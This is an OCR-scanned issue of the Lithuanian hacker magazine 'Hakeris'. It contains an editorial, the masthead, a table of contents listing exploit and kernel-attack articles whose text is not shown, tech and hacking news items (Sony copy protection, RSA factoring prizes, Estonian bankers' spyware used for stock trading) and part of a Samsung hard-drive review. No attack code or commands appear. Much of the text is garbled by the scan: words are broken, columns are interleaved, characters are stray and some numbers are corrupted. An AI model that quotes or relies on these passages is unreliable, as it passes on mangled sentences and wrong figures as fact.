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Visi eina į prieki. Tik kol kai kurios grup 
sukonstruoja tokią techninę įranga, jog atsiranda darbo ir tretiesiems — speciali 
palaikymo ir suderinamumo programų kūrimas. Ir kam visa tai? Kažkas pasakytų 
og tikslas — palengvinta mūsų kasdienybė. Viska gi gali padaryti kompiuterinės 


s kuria naują programinę įrangą, ki! 


technologijos! Tačiau ar kas nors jaučia jų indėlį? Kalbu ne apie kelio temperatūros 
nformaciją kompiuterizvotoje iškaboje virš autostrados ir ne apie sinchroniška 


kiančius šviesoforus. Kalbu apie tai, kas „kvepia“ technologijomis 


Puikus pavyzdys — viena kompanija, kuri sukūrė keleta itin įdomių 
Drabužių valymo įrenginys, kuriame vietoj vandens ir skalbimo priemonių naudoji 


5 oras ir dezodorantas. Arba pažiūrėkime, ka gi mums 


mi neigiami jonai, suspau: 
gero gali duoti nešiojamas sulankstomas ir pagal reikiamą tūrį pritaikomas šaldytų 
vas! O kiek juoko gali sukelti „siurbiantys“ batai, kuriais apsiavus grindis galima 
išvalyti tiesiog vaikštinėjant po kambari. Ir kam gi reikalingi tokie įmantrūs niekt 
čiai? Parodyti, jog technologijos žengia į prieki. Ir pasėti naują grūdą, iš kurio išavą 


programinės įrangos šiems prietaisams kū 


Ir kol vieni bando pasiūlyti ką nors įmantresnio, kiti raško to paties medž 
siūlydami savus „pataisymus“ ar suderinamumo bei išskirtinių savybių suteikimi 


Ar tai vagystė? Turbūt ne - juk, kaip ir minėjau, visi žengia į į 
keletą nuolat lūžinėjančių operacinių sistemų 


p 
* 
A 
* 
"A 
" 
Ž 
Ž 
„r 

+ 


| 
| 


"11 


z 
| 


"IĮ 


|| 


Žurnalas „HAKERIS“ 
ISSN 1648-6862 


http://www.hakens.lt 


roottohakeris.ll 


Vyr. redaktorius 

Arnaldas Augutis 
Atsakingasis redaktorius 
Artūras Rumiancevas 
Dizaineris-maketuotojas 
Andrius Raižys 

Stilistė 


Laura Barzdaiuenė 


REDAKCIJA: 
Žydrūnas Kliševii 


Edmundas Valaitis, 


Kristina Dembinskaitė 
Aurelija Pociūtė, 
Jurgita Martikait 
Erikas Ovčarenko 
Ričardas Jaščemskas, 


Teresė St opytė 


enė 


LEIDĖJAS: 
AB „InDiza 


s 


PAUDĖ: 


B spDaustuvi Spindulys 
LedIMINO į ( 

LT 318 Kau 

Užs Ir. 6.1 

"urna Xe rblau) 
sų kompanija 


GameLand Inte on 


Bet ko ro8ramine iranga 15 
kitą informacija naudojate SAVO PATIES 
RIZIKA 

r tik JUS VIENINTELIS atsakoti 


už bet kokią žalą, padarytą kon Įtennei 
sistemai, VISUOMenėi ar savo paUes £erove 
Redakcijos nuomonė 


ebūtinai sutampa šu 


tekstų autorių nuomonė 


neWs 


06 .... NAUJIENOS 
software 

10 5 SAMSUNG HD300LD 8 HM100JC 

12 > SHREDDERS, WIPERS, CLEANERS 3 ERASERS 

m MARŠRUTINIAI NUKRYPIMAI 
scena 

22 SKAITMENINIO AMŽIAUS SIMBOLIAI 
implant 

26... NEMIRTINGUMO TECHNOLOGIJA 
hacking 

30... HACK FAO 

31. EKSPLOITŲ APŽVALGA 

ŠE 56 ORINIS ATMETIMAS 

EB HACK FAO 

38 STAMBUS PIRKINYS 

B PLEPUS ASILAS 

46 .... SISTEMINIS MASKARADAS 
unixold 

SB > ANALIZUOJAME TINKLO KRAUJĄ 

56 PAŽINK SAVO OS 

ios NULINIO ŽIEDO UŽGROBIMAS 


64... „LINUX“ BRANDUOLIO ŠTURMAS 


6| 


HACKNEWS A 


HACKNEWS A 


PANACĖJA NUO PIRATŲ 


Ar yra panacėja nuo piratavimo? Daugelis mano, kad ne. Ta- 
čiau korporacija „Sony“ šiek tiek kitos nuomonės. Lapkričio pra- 
džioje IT gigantas užpatentavo naują technologiją, kuri galėtų 
atbaidyti lengvų pinigų medžiotojus. Tačiau tuo pačiu ji padarys 
neįmanomu paprasčiausią apsikeitimą diskais tarp vartotojų. 
Apsaugos esmė į CD idiegti specialų kodą, kuris po vienkar 
tinio nuskaitymo į konsolės atminti yra sunaikinamas, todėl ki 
tuose grotuvuose toks diskas daugiau nepasileis. „Sony“ pla 
nuoja šią naująją technologiją įdiegti į ateityje išleisiamą PlayS 
tation 3. Kompaniją galima suprasti, tačiau jau dabar šis spren 
dimas sukėlė pasipiktinimų audrą, pagrinde tarp PS2 gerbėjų. 
Iš tiesų, įsivaizduok tokią situaciją: tu prašai pardavėjo patikrinti 
žaidimą, grižti namo, O jis 

pas tave neveikia. Arba dėl 

to sudega pats tavo žaidi 

mu kompiuteris. Tu nusi 

perki naują, tačiau apie 

diską gali pamiršti. Specia 

listai mano, kad jeigu „So 

ny“ ir toliau ieškos būdų, 

kaip „apsunkinti žaidėjų gy 

venimą“, tai ji praras dau 

gelį pirkėjų. Gali būti, kad 

ši apsauga taip pat bus 

naudojama Blu-ray for 

mato diskų su filmais ga 

myboje. 


DENIS PRIPAŽINTAS KALTU 


Kalbame apie britų hakerį Danielį Katbergą, kuris žymus savo 
pagalbos cunamio aukoms elektroninio fondo nulaužimu. Vai- 
kinas dirbo IT kompanijoje „Corsaire“, kur užsiiminėjo Kkompiu- 
terių saugumu ir turėjo priėjimą prie vertingų informacinių re- 
sursų. Nepaisant areštų ir kaltinimų, kompanijos vadovybė ma- 
no, kad hakeris nusipelno pasitikėjimo, o šis incidentas 
viso labo paprasčiausias nesusipratimas. Pats Danielis savo 
poelgį paaiškino taip: jis iš pradžių pats nusprendė padėti fon- 
dui ir į jo sąskaitą pervedė pinigų, tačiau po to įtarė, kad tapo 
sukčių auka. Geriausias būdas patikrinti svetainės autentišku- 
mą —- pasirausti šakninia- 
me kataloge, ką jis, tiesą 
sakant, ir padarė. Tačiau 


adminai jį susekė ir perda- 
vė valdžios organams. Ha- 
keris buvo teisiamas ir pri- 
pažintas kaltu. Kol kas nė- 


ra žinoma, koks bus 
nuosprendis, tačiau, įverti- 
nus tai, jog areštas pir- 
masis, ir geras rekomen- 
dacijas, galima manyti, kad 
jis gaus baudą ir laisvės at- 
ėmimą lygtinai. 


APDOVANOJIMAI 
UŽ RAKTŲ NULAUŽIMĄ 


„RSA Security“ ta 
kompanija, kuri ne 


tik nepersekioja ją 


bandančių nulaužti 
hakerių, bet net 
jiems už tai moka. 
Prieš kurį laiką ji Iš 


publikavo didėjančio 
ilgio raktų grandinę ir 
pasiūlė apdovanoji 
mą tiems, kas sUge 
bės nulaužti 
Kuo ilgesnis grandinėje pateiktas raktas, tuo brangiau jis kai 
nuoja. Paskutinio skaičiaus ilgis 2048 bitai, jis įvertintas 
200 tūkstančių dolerių. Pačiais aktyviausiais estafetės daly 
viais tapo kriptoanalitikų grupė iš Bonos, jie šių metų gegužę 
dekodavo 200 ženklų skaičių, o lapkritį 193 ju. Tam buvo 
panaudota 80 Opteron 2,2 GHz procesorių. | kompiuteristų Iš 
Bonos pergales RSA žiūri skeptiškai. Vaikinams prireikė keleto 
mėnesiu tam, kad įveiktų toli gražu ne pačius sudėtingiausius 
raktus. Tokiais tempais dekoduoti pagrindinį raktą prireiks dė 

šimtmečių. Beje, įdarbintą kompiuterinę galią vargu ar galima 
pavadinti gigantiška. Šiuo metu pasaulyje veikiantys superkom 
piuteriai kur kas greitesni už tokį klasterį, tačiau jie dirba su 
kitomis užduotimis. Jeigu būtų galima juos įdarbinti arba pa 
naudoti padorų vartotojiškų mašinų tinklą, tai reikalai į priekį 
judėtų kur kas greičiau. 
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BALTARUSIJOJE KURIAMI 
ALTERNATYVUS „WINDOWS“ 


Baltarusijos respublika metė iššūkį galingajai „Microsoft“. Beje, 
ji tai padarė toje srityje, kurioje programinės irangos monstras 
ypatingai stiprus. Sensacingą naujieną apie tai, kad Baltarus 
jos programuotojai pradėjo nuosavos operacinės sistemos kū 
rimą atvirų išeities tekstų pagrindu, dar prieš du metus Zenevo 
je vykusioje IT konferencijoje pranešė pats šalies prezidentas 
Aleksandras Lukašenka. Tiesa, tuomet tai labiau priminė | svars- 
tymus. Aleksandras aiškino, kodėl jų gyventojams 
dinėti intelektualias teises ir pirkti piratinę iranga, 
nimai neatitinka programinės irangos kainu. Alternatwių langį- 
nių kūrimas savo jėgomis galėtų būti problemos sprendimas 
Europos Sąjunga Lukašenką palaikė, tačiau programuotojai tik 
dabar pradėjo aktyviai dirbti. Jie 
savimui, kuris šiuo metu jau turėtų būti išsiųstas Europos Są- 
jungai. Tikimasi, kad baltarusiška sistema bus suderinama su 
Windows programomis ir bus (jeigu bus) pardavinėjama po 15 
dolerių. Apie jos vertingumą, kaip ir apie išleidimo laiką, Kol kas 
šnekėti dar anksti, nes sistema šiuo metu yra ankstyvojoje Ku 
rimo stadijoje. Vis dėlto pagirtina tai, 
gomis stengiasi kovoti su „Microsoft“ monopolija. Kas Iš to Iš 
eis, mes sužinosime po keleto metų. Arba kelių dešimtmečių. 


tenka pažei- 


kiek jų atlygi 


ruošė prašymą projekto finan- 


kad žmonės savomis jė 
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„GOOGLE“ ĮDIEGINĖJA 
NAUJĄ HOSTINGO SERVISĄ 


Praėjusių metų lapkričio 15 dieną Google paleido naują servi- 
są Google Base. Tai nemokamas praktiškai neribotos apim- 
ties bylų hostingas su patogiais rūšiavimo ir paieškos įran- 
kiais. Antrasis panaudojimo variantas geras šaltinis, jei nori 
pasidalinti savo informacija ir bylomis su kitais vartotojais. 
Galima netgi kurti blogus arba kabinti reklaminius skelbimus. 
Jau dabar specialistai nuspėja Konkuravimą su tokiais porta- 
lais, kaip eBay, kurie specializuojasi komercinių skelbimų ka- 
binime. Vis dėlto Google direktorius Markas Leibovicas patiki- 
no, kad jie neturi tikslo konkuruoti su tokiomis svetainėmis, 
vietoje to jie paprasčiausiai padeda žmonėms savo draugams, 
pažistamiems arba tiesiog kitiems vartotojams pateikti tam 
tikrą informaciją, kuri dažniausiai yra nekomercinio turinio. 
Kol kas Google Base yra beta testavimo stadijoje, o tu turi 
galimybę tapti vienu pirmųjų serviso vartotoju, tam reikia užsi- 
registruoti adresu http://base.google.com. 


Go! ale 


Pi Stuff on Google 


Post your own Item 
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„MICROSOFT“ PALAIMINTAS 
PARDAVIMAS IS ANTRŲ RANKŲ 


Labai daug ką nustebino nesenai paskelbtas „Microsoft“ spren- 
dimas. Bilis, kuris visada buvo licencijų ir kokybiškos techninės 
pagalbos šalininkas, palaimino britų perpardavinėtojus. Langi 
nių partijos dėžutėse pateikiamos pardavimui pagrinde iš ban 
krutavusių firmų ir parduodamos su 20-5076 nuolaida. Anks- 
čiau tai buvo laikoma neteisėta ir prilyginama piratavimui. Da 
bar visose second hand parduotuvėse kabo „Microsoft“ iškaba: 
„palaiminta Geitso“. Ar kažkas panašaus. Pasirodo, kad progra- 
minės įrangos milžinė tai planavo dar prieš pusantrų metų. Fir- 
mos „Basilica“ programinės įrangos licencijavimo vadybininkas 
Krisas Lamas tokią situaciją pakomentavo taip: „Tai iš tiesų grės- 
mė mums, kadangi mes orientuojamės į pilną paslaugų spek- 
tro pateikimą savo užsakovams. Aš nežinau, kokias kainas siūlo 
šie vaikinai, tačiau jeigu bus galima įsigyti lygiai tokias pat licen- 
cijas už trečdalį kainos, pasekmės bus katastrofiškos“. 
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„MICROSOFT KURIA“ 
NAUJĄ APSAUGOTĄ OS 


Kodinis projekto pavadinimas Singularity. Naujoji sistema ne 
turi jokio ryšio su Windows ir bus pagrįsta visiškai naujomis tech 
nologijomis. Ją kuria atskira 35 programuotojų komanda, o pa 
grindinis kriterijus yra patikimumas. Dabar programuotojai bai 
ginėja sistemos branduolį, kurį sudaro 300 tūkstančių C7* kodo 
eilučių, bei šlifuoja naująją technologiją Software Isolated Pro 
cesses (SIP), kuri leidžia procesus vykdyti izoliuotuose „Kontei 
neriuose". 

Toks požiūris leidžia geriau ir greičiau patikrinti visų Kkomponen 
tų veikimą pakanka kreiptis į tą SIR kuriame jis paleistas. 
Kol kas nežinoma, kaip bus pozicionuojama naujoji „Microsoft 
OS“. Greičiausiai Singularity taps alternatyviu sprendimu rim 
toms firmoms, kurios rūpinasi savo saugumu, ir bus naudoja 
ma finansų sferoje arba ten, kur saugojama „visiškai slaptai“ 
kategorijai priskiriama informacija. 


KINGSTON DATATRAVELER 
512 MB USB 2.0 FLASH DRIVE 


Vadinkite juos kaip tik norite — nešiojamais duomenų kaupikliais, 
duomenų laikmenomis arba USB „raktais“ bei atmintinemis - tai 
neturi jokios įtakos bendram šių prietaisų skverbimuisi į mūsų 
gwenimą. Kiekvienas kompiuterio vartotojas susiduria su proble 
momis, kai reikia persinešti arba atvirkščiai parsinešti tam 
tikrus duomenis iš vieno kompiuterio į kitą. Tokiais atvejais CD 
bei DVD diskus labai dažnai pakeičia itin populiarios laikmenos 
mažiems informacijos kiekiams. „Kingston“ pristato naująjį U3 
Data Traveler USB Smart Drive laikmeną, kuri keičia mūsų požiū- 
ri į Iš pirmo žvilgsnio nekaltus prietaisus. Ypatingas šio prietaiso 
bruožas jis leidžia savyje, t.y. nešiojamoje laikmenoje, idiegti 
programinę įrangą, kuri puikiai veikia su bet kokia darbo stotimi. 
Norite turėti patį mažiausią kompiuterį? Prašom „Kingston“ 
yra per žingsnį nuo to. | šią laikmeną įdiegėme pačias svarbiau- 
sias programas ir pabandėme jo funkcionalumą 
prie skirtingų Kompiuterių - visur gavome puikų 
veiksmingumo rezultatą. „Kingston“ turbūt ne be 
reikalo šiam produktui suteikia 5 metų garantiją. 
Be to, ši kompanija siūlo ir platų programinės 
įrangos pasirinkimą šios laikmenos rėmimo in 
termeto svetainėje www.u3.com. Mūsų džiaugs 
mui nėra ribų - veikia tiek kompiuteriniai žaidi 
mai, tiek nuotraukų redagavimo bei komunika- 
vimo internetu programos. Kas tai? Įprasta USB 
laikmena? Spėjame, kad tikrai Kur kas dau 
giau už tai, kas slepiasi po „USB laikmenos“ 
vardu. Tiksliau, kas slėpėsi po šiuo vardu, nes 
„Kingston“ padarė perversmą. 


„a 


Specifikacijos: 
Talpa: 512 MB 
Greitis: vidutiniškai 20x 
lrašymo greitis: 3 MB/s 
Nuskaitymo greitis: 6 MB/s 
Jungtis: USB 2.0 
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IŠDIDUS ŽODIS „MODEMAS“ 


Lokalūs tinklai ir kitos komunikacijų naujovės — tai, be jokios 
abejonės, labai gerai, tačiau neverta raukytis išgirdus žodį „mo- 
demas“. Ypač jeigu tai ne paprastas, o kompanijos „Acorp“ su 
kurtas ADSL modemas. Siandien ji mums pristato dvi savo nau- 
joves: antros kartos modemus Sprinter OADSL LAN120 ir Sprin- 
tercOADSL LAN420. Prierašas apie naujaja kartą reiškia labai 
malonų dalyką: šie modemai suderinami su ADSL2 ir ADSL2+ 
technologijomis pagrįstu ryšiu, prie kurių jau senai po truputi 
pereina dabartiniai tiekėjai. Tai reiškia, kad jie gali priimti duo- 
menis 24 Mbit/s greičiu. Modelis Sprinter(0ADSL LAN120 skir- 
tas naudoti namie arba nedideliame biure. Dėl įmontuotos Fast 
Ethernet sąsajos ir realizuoto maršrutizatoriaus funkcionalumo 
ji galima prijungti prie lokalaus tinklo ir užtikrinti ADSL kanalo 
pateikimą keliems vartotojams vienu metu. Modemas Sprin 
ter OADSL LAN420 turi keturių lizdų Fast Ethernet komutatorių 
ir realizuotą maršrutizatoriaus funkcionalumą, kas leidžia varto 
tojui išvengti būtinybės įsigyti atskirą Ethernet Komutatorių. 


[=) 


NESISTOJAM NUO SOFOS 


Tikriausiai Vaikystėje visi girdėjo apie stebuklingą burtų |az- 
delę, kuri savo šeimininkui duoda labai daug visko. O po to 
mes augome ir supratome, kad jokios lazdelės nėra. Nusivy 
limas buvo klaikus. Kompanija „Logitech“ užsimanė sušvel 
ninti šiuos nekokius vaikystės įspū- 
džius, išleisdama nuotolinio valdymo 
pultą Harmony Advanced Universal 
Remote Control. Dabar galima pa- 
miršti krūvą nuotolinio valdymo pul- 
telių, kiekvienas kurių gali valdyti tik 
vieną buitinį įrenginį. Šis Logitech pul- 
tas yra universalus su juo galima 
valdyti praktiškai bet kokį namų elek- 
troninį įrenginį: Kompiuterį, televizorių, 
namų kino teatrą, X-Box... Beje, tai 
galima daryti ne iš eilės, 0 vienu me- 
tu, kadangi nedideliame SK ekrane ga- 
lima išsirinkti reikiamą įrenginį. Inter- 
nete pateikiama kompanijos duome- 
nų bazė saugo informaciją apie dau- 
gybę įrenginių ir jų valdymo nustaty- 
mus. Mes juos tiesiog parsisiunčiam, 
per USB jungtį perkeliame į pultą ir 
vualia! Kadangi televizorių valdyti gali 
bet kuris žmogus, o kompiuterį ne, 
kompanija Logitech numatė darbo su 
pultu patogumą ir lengvumą spe 
cialus vedlys padės viską išsiaiškinti net 
ir nepatyrusiam vartotojui. 


HACKNEWS A 


GOOD BYE IPOD! 


Daugelis populiarių daiktų be milijonų gerbėjų būtinai turi ir 
priešininkų. Beje, bloga linkinčių kiekis ir jų poelgių ekscentrišku 
mas tiesiogiai proporcingi įrenginio paplitimui. Nekenčiantieji iPod 
grotuvo nesenai sukūrė svetainę smashmyipod.com, kurios tikslas 
buvo surinkti 400 doleriu naujo iPod įsigijimui, po ko nukeliauti | 
firminę Apple parduotuvę ir, nesitraukiant nuo kasos, į šipulius 
sudaužyti naująjį pirkinį tiesiog nustebusių pardavėjų ir pirkėjų aky 
se. Iš karto po svetainės sukūrimo autorių adresu pasipylė tūks 
tančiai rūsčių laiškų ir grasinimų nuo obuolių mėgėjų, tačiau žmo 
nių, kurie norėjo paremti visą šį reikalą taip pat buvo pakankamai, 
todėl reikiama suma buvo surinkta per ganėtinai trumpa laika. 
Kaip bebūtų keista, autoriai nepriglaudė surinktų pinigu, o po kelių 
dienų, Kaip ir žadėjo, su ypatingu cinizmu sąžiningai įvykdė kas 
buvo suplanuota. Tuo pačiu visas egzekucijos procesas buvo nufil 
muotas ir pateiktas nuosavoje svetainėje, iš Kur ji buvo galima 
laisvai parsisiusti. Šiuo metu šį įrašą jau siuntėsi daugiau nei 
250000 kartų. Be abejo, svetainės kūrėjai nesiruošia sustoti ties 
šiais pasiekimais, todėl jau pradėti trys analogiški projektai, nu 
kreipti prieš naujos kartos žaidimų konsoles (Xbox 360, PlayStation 
3 ir Nintendo Revolution). Beje, šiuo metu Mirties nuosprendis 
turėtų būti įvykdytas ir „Microsoft“ žaidimų priedui (reikami 430 
dolerių jau surinkti). 


Ziauru 


HAKERIAI FINANSŲ BIRŽOJE 


Kaip galima praturtėti, jeigu tu esi bankininkas ir neblogai gaudaisi 
kompiuterių saugume? Galima iš savo paties banko pavogti mili 
joną dolerių, tačiau kitą dieną tave pagaus ir pasodins. Galima 
prekiauti reikiama informacija, tačiau tai taip pat nesaugu. Kas 
žino, į kokias rankas ši informacija paklius ir ar pirkėjas tavęs ne- 
išduos. Estų bankininkai Oliveris Peekas ir Kristijanas Lepikas su 
galvojo naują būdą. Pasinaudoję banko kompiuteriu LHV, jie Busi 
ness Wire svetainėje įdiegė savo programėlę ir pradėjo laukti. De- 
rėtų paminėti, kad BW — tai centrinis portalas, į kurį suplaukia 
pranešimai spaudai ir informacija apie įvairių viso pasaulio kom- 
panijų akcijas. Visa tai atkeliauja šifrfuotu pavidalu, po ko svetai- 
nės darbuotojai informaciją apdoroja ir ją pateikia liaudžiai. BW 
lyderiaujančių biržų brokeriams yra pagrindinis informacijos šalti- 
nis, remiantis šiais duomenimis atliekama vienų ar kitų akcijų 
kainų analizė. Bet sugrįžkime prie mūsų hakerių. Šnipinėjanti pro- 
gramėlė automatiškai parinkinėjo uždarų serverio sričių slaptažo- 
džius ir visus gautus duomenis išsiųsdavo dviems bankininkams. 
Net ir 2 valandų pranašumas biržoje yra pakankamas, kad užsi- 
dirbtum krūvą pinigų. O estų vaikinai laiko veltui tikrai neleido. Vos 
per 10 mėnesių biržos žaidimų panaudojant nulaužtą informaciją 
Oliveriui ir Kristijanui pavyko uždirbti beveik 8 milijonus dolerių. 
Tačiau saldus gyvenimas ilgai tęstis negalėjo. Prieš porą mėnesių 
vaikinai buvo išaiškinti, o dabar jų byla svarstoma Niujorko teisme. 
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MUZIKINIS SILIKONAS 


Kai kurie žmonės tokie pragmatiški, kad siekia surasti praktinį 
pritaikymą iš pirmo žvilgsnio visiškai nenaudingiems dalykams. 
Paimkime kad ir silikoną. Taip taip, pačius paprasčiausius sili- 
koninius implantus, skirtus biustui padidinti. Atrodytų, sunku 
būtų surasti beprasmiškesnį daiktą, tačiau ir čia viskas ne taip 
beviltiška. Jan Pearson tyrinėtojas iš BT Laboratories labo- 
ratorijos — pasiūlė į silikoninius. protezus įmontuoti mp3 gro- 
tuvą! Beje, į vieną krūtį būtų montuojamas pats grotuvas, O į 
kitą — duomenų saugojimui skirta mikroschema. Vienas su 
kitu ir su pasauliu jie bendrautų per Bluetooth technologiją. 
Savaime suprantama, abu moduliai būtų visiškai miniatiūri- 

niai, todėl lytėjimo atžvilgiu vis- 

kas turėtų likti taip pat; kaip ir 


anksčiau. Iš esmės patį projek- 
tą planuojama įgyvendinti ne 
anksčiau nei po 15 metų, 0 iš- 
samesnė informacija kol kas 
4 nėra viešinama, todėl likusias 
smulkmenas tenka bandyti su- 


' galvoti už autorių. Visų pirma, 

““ neaišku, kaip moduliai krausis. 

Akivaizdu, kad bet kokios išorinės jungtys nėra priimtinos, to- 

dėl bus galima panaudoti šiais laikais populiarų indukcinį arba 

seną gerą bei patikrintą kratymo metodą :). Norint klausytis 

muzikos taip pat prireiks belaidžių ausinių (vibracijų perdavi- 

mas per kaulą ir garsiakalbiai atkrenta) ir valdymo pultelio. 

Tiesa, man labai įdomu, ar po tokio atnaujinimo skydelis bus 
laikomas kiborgu? 


DU ŽINGSNIAI PIRMYN 


Pastaruoju metu naujienose ne kartą buvo pasirodę pranešimai 
apie įrenginių išradimą, kurie leidžia nuotoliniu būdu valdyti, pavyz 
džiui, tarakonus arba peles. Tačiau niekas nė neitarė, kad mani 
puliuoti žmogumi bus nė kiek ne sudėtingiau, ir tuo pačiu bus 
galima apsieiti be chirurginio įsikišimo bei įvairių mikroschemų Im 
plantavimo į organizmą. Šis išradimas priklauso japonų Korporaci- 
jai NTT (Nippon Telegraph 6 Telephone). Įrenginys didelės „au- 
sinės“, uždedamos ant bandomojo, ir pats nuotolinio valdymo pul- 
tas (kaip lenktynių mašinų). Savaime suprantama, nepavyks pri- 
versti bandomąjį sušokti ką nors rimtesnio, tačiau galima valdyti jo 
udėjimą (pirmyn, atgal, kairėn, dešinėn). Jeigu pulte sumontuotą 
vairalazdę pasuktumeė bet kuria kryptimi, tai „ausinės“ pasiųstų 
vos pastebimą elektrinį impulsa į ausies sritį (maždaug ten, kur yra 
vestibiuliarinis aparatas). Tačiau smegenys šį impulsą suprastų ne 
kaip lengvą dilgtelėjima, o kaip vestibiuliarinio aparato perduoda- 
mą signalą, kad Kūnas prarado pusiausvyrą ir pradeda kristi. Tuo 
metu Žmogus iš tiesų praranda pusiausvyrą ir. nenorėdamas nu- 
kristi, bus priverstas žengti žingsnį atitinkama kryptimi (būtent ten, 
kur link buvo stumtelėta vairalazdė). Kaip parodė bandymai, ne- 
klausyti tokio įsakymo visiškai nerealu, nes priešingu atveju tiesiog 
nugriūsi. Pareikšta, kad irenginys skirtas virtualiems žaidimams, 
norint suteikti daugiau realistiškumo, tačiau kol kas nėra žinoma, 
kur jis bus realiai pritaikomas. Beje, naujovė dar negavo oficialaus 
patvirtinimo, jog yra nekenksminga sveikatai, todėl apie įrenginio 
pardavimų pradžią šnekėti kol kas dar ankstoka. 
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TERABAITINIS KONSTRUKTORIUS 


Jeigu tu nesuspėjai vaikystėje prisižaisti su įvairlais konstruk- 
toriais, tai dar ne viskas prarasta. Tačiau visai nebūtina raus- 
tis palėpėje ir ieškoti dulkėmis apaugusio maišelio su senais 
žaislais, dabar galima prisigalvoti ir technologiškai šiuolaikiS- 
kesnių pramogų. Pavyzdžiui, užsienyje gerai žinoma firma La- 
Cie nesenai anonsavo išorinių kietųjų diskų seriją LaCie Brick, 
kurie pagaminti pilnai LEGO detales pakartojančios, tačiau 
atitinkamai didesnės formos. Galima pasirinkti trijų spalvų 
(baltus, mėlynus ir raudonus) ir trijų skirtingų dydžių (160 Gb, 
250 Gb ir 500 Gb) diskus. Deja, kitos charakteristikos nėra 
pranešamos, tačiau galima tikėtis, kad čia viskas gerai (Fire 
Wire ir visa kita). Beje, pati prabanga čia tame, kad blokus 
vieną su kitu galima sujungti lygiai taip pat, kaip Ir iprastinia 
me LEGO. Taip iš kelių dešimčių kietųjų diskų galima pastaty 
ti sienelę arba net nedidelį namelį. Būtų iš viso nuostabu, 
jeigu gamintojai išplėtotų šią idėją ir išleistų kitokios 
bei funkcionalumo blokelius. Vienintelis dalykas, kuris 
riboja jaunojo architekto fantaziją tai kaina. Diskai, pr 
klausomai nuo talpos, kainuos nuo 119.99 iki 399.99 ame 
rikietiškų prezidentų. 


formos 


kol kas 


„ASUS“ NELEIS PASIMESTI 


Pažangius keliautojus gali nudžiuginti gera naujiena iš kompani 
jos „Asus“ stovyklos, kuri pradėjo gaminti du kišeninių AK mo 
delius (MyPal A636 ir A632), kurie aprūpinti GPS funkcijomis 
Geram ryšiui su palydovu palaikyti skirta ištraukiama antena 
((25x25 mm, saugoma KAK korpuse), o vaizdą ekrane galima 
paversti tiek vertikaliai, tiek ir horizontaliai. Aprūpinti Intel XSca 
le416 MHz procesoriumi ir Windows Mobile 5.0 operacine sis 
tema, ASUS A636 ir A632 neprarado įprastinių kišeniniu kom- 
piuterių funkciju, įskaitant Microsoft Office programas, Įmon 


tuotas Wi-Fi ryšio priemones (A636 modelyje), Bluetooth, Ir 
DA, taip pat papildomų įrenginių prijungimui skirtą USB jungti 
Be 128 Mb įmontuotos Flash ROM ir 64 Mb SDRAM atminties, 
A636/632 taip pat palaiko atminties korteles (ASUS A636 
SD lizdą, o ASUS A632 taip pat veikia 
Įrenginių svoris — 186 gramai. 


tur 
r su miniSD kortelėmis) 
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Kietasis SAMSUNG draugas 
SAMSUNG HD300LD 8: HM100JC 


Milžiniški daugialypės terpės bylų kiekiai ir tobulė- 
janti bei sparčiai evoliucionuojanti programinė įran- 
ga norom nenorom verčia Tave apsirūpinti talpes- 
nėmis laikmenomis. Tad nesistebėk, kad kie- 
tujų diskų gamintojus užvaldė gigantomani- 
ja — besirungdami vienas su kitu jie be- 
atodairiškai pasinėrė į HDD talpos di- 
dinimą, neretai jų pagaminti mil- 
žinai yra „nerangūs“, triukš- 
mingi ir iš tiesų brangūs. 
Mūsų laimei pasaulinė- 

je elektronikos rinkoje 
yra ir blaiviai mastančių 
gamintojų, kurie nesivadovau- 
ja vien kaprizingais naudotojų po- 
reikiais. Kompanija „Samsung“ 
viena iš lyderių kietųjų diskų rinkoje 
pristatė naują T133 seriją, pasižyminčią itin 
tyliu darbų ir didele sparta. Iki šiol gamintojai 
naudojo dvi plokšteles duomenims saugoti. Sam- 
sung T133 serija turi net tris plokšteles. Toks spren- laikmenos idealiai tinka nešiojamiesiems kom- 
dimo būdas leidžia gaminti net iki 400 GB talpos piuteriams. 

laikmenas. Ne veltui T133 serijos kietieji diskai gavo tyliausių pasauly- 
Redakcija buvo iš tiesų pamaloninta, kai gavo išban- je diskų titulą. Kaip gi gamintojui pavyko pasiekti tokių aukš- 
dyti ką tik nuo konvejerio nuriedėjusius du šios seri- tumų? 

jos modelius: 300 GB talpos HD300LD UltraATA/ Visa esmė slypi analogų neturinčių technologijų trejetuke. Noi 
100 kietasis diskas skirtas stacionarioms PC platfor- seGuard, Silen Seek ir FDB (Fluid Dynamic Bearing) štai trys 
moms, 0 100 GB HM100/JC Ultra ATA/100 orientuo- magiški burtažodžiai, darantys T133 seriją išskirtine 

tas į nešiojamuosius kompiuterius. Abiejų šių gra- Kietųjų diskų keliamas triukšmas ne tik blaško naudotojo dė 
žuolių testavimui skrupulingai parinkome techninę mesį, bet ir turi įtakos jo produktyvumui. Nustatyta, kad la 
įrangą: HM100JC buvo testuojamas su /BM Think- biausiai žmogų erzinantys kietųjų diskų keliami garsai sklin 
pad T42 serijos nešiojamuoju kompiuteriu, o jo tal- da 1 KHz-3 KHz diapazone. Dauguma HDD sukeliamų gar- 
pesnis giminaitis — AMD Athlon 64, 2000 MHz sų atsiranda dėl mechaninių vibracijų besisukant varikliukui 
3000+. ir slankiojant nuskaitymo galvutėms. Taip pat garsinės vibra- 
cijos sustiprėja atsirandant rezonansui tarp HDA (head-as- 
sembly) galvučių mazgo ir guolių keliamų vibracijų. Įvertinus 
visus šiuos triukšmo šaltinius Samsung sukurta unikali Noi- 
seGuard technologija slopina nepageidaujamus virpesius. Tam 
tikslui naudojama optimali konstrukcinių medžiagų kombi- 
nacija, absorbuojanti bei slopinanti garsines vibracijas. Ne 
mažą vaidmenį čia taip pat vaidina ir HDD korpusas, kurio 
ypatinga konstrukcija taip pat atlieka slopintuvo vaidmenį. 
Didelį indelį į T133 serijos kietųjų diskų tylų darbą ir spartą 
įneša Silent Seek technologija. Informacijos nuskaitymo lai- 
kas — svarbiausias HDD našumo rodiklis. Kuo greičiau nu- 
skaitymo galvutė pozicijonuojama virš takelio, tuo greičiau 
nuskaitoma informacija. Didinant nuskaitymo laiką, neišven- 
giamai didėja ir akustinės vibracijos. Silent Seek funkcija at- 
sakinga už galvutės aktuatoriaus keliamas vibracijas. Siekiant 
jas sumažinti, aktuatorius galvutes pozicionuoja sinusoidės 
trajektorija. Dėl Silent Seek T133 serijos HDD keliamos gar- 
sinės vibracijos vidutiniškai 4 dBA žemesnės, negu kitų ga- 
mintojų kietųjų diskų. 


Prasukus keletą 
testukų, pastebėjo- 
me vieną dalyką — ne- 

sigirdėjo jokio diskų kelia 
mo triukšmo. Tik HDD diodo 
mirksėjimas išduodavo jų darbą. 
Tikriausiai Tu jau supratai, kad di 
